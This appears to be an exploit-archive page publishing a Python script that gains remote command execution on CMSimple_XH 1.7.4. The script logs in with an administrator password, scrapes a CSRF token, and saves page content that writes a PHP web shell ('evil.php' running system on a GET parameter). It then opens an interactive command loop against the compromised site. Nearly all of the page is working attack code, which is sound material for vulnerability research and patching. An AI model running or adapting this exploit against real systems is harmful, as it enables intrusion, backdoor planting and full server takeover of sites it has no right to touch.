exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CMSimple_XH 1.7.4 Remote Command Execution

CMSimple_XH 1.7.4 Remote Command Execution
Posted Oct 1, 2021
Authored by Halit Akaydin

CMSimple_XH version 1.7.4 remote command execution exploit.

tags | exploit, remote
SHA-256 | 9a204cd68fcab96b3fa95acfa0a331437c6c63aa3ad64cc954092cb1b4d477f6

CMSimple_XH 1.7.4 Remote Command Execution

Change Mirror Download
# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 01-10-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.cmsimple-xh.org/
# Software Link: https://www.cmsimple-xh.org/?Downloads
# Version: 1.7.4
# Category: Webapps
# Tested on: Linux/Windows


# CMSimple_XH is an open source project under GPL3 license
# Includes an endpoint that allows remote access
# Backup page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.

# Example: python3 exploit.py -u http://example.com -p Admin123



from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse


def main():
parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)



def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass


# Check Host Status
try:
response = requests.get(args.host)
if response.status_code == 200:
login(args)
else:
print("[-] Address not reachable!")
sleep(2)

except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)


def login(args):

url = args.host + "/?&login"
cookies = {
"XH_2f": "evil"
}
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?&login"
}
data = {
"login": "true",
"keycut": args.password,
"submit": "Login"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)

token = response.cookies.get("XH_2f")
soup = BeautifulSoup(response.text, 'html.parser')

if (soup.find("link",{"rel":"next"})['href'] != "/"):
print("[!] Login Success!\n")
sleep(2)
csrf(args,token)
else:
print("[!] Wrong password!!\n")
sleep(2)


def csrf(args, token):

url = args.host + "/?file=content"
cookies = {
"status": "adm",
"XH_2f": token
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?&settings",
"Accept-Encoding": "gzip, deflate",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)

try:
soup = BeautifulSoup(response.text, 'html.parser')
csrf = soup.find_all("input", type="hidden")[3].get("value")
create(args, token, csrf)
except Exception as e:
print(e)
else:
pass



def create(args, token, csrf):

payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"

url = args.host
cookies = {
"status": "adm",
"XH_2f": token
}
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?file=content&action=edit&xh_success=content",
"Accept-Encoding": "gzip, deflate"
}
data = {
"text": payload,
"file": "content",
"action": "save",
"xh_csrf_token": csrf
}
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)

if (response.status_code == 200):
print("[!] Create Vuln File!\n")
sleep(2)
exploit(args)
else:
print("[!] Create Failed!\n")
sleep(2)


def exploit(args):

print("[+] Exploit Done!\n")
sleep(2)

while True:
cmd = input("$ ")
url = args.host + "/evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}

response = requests.post(url, headers=headers, timeout=5)

if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)



if __name__ == '__main__':
main()

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close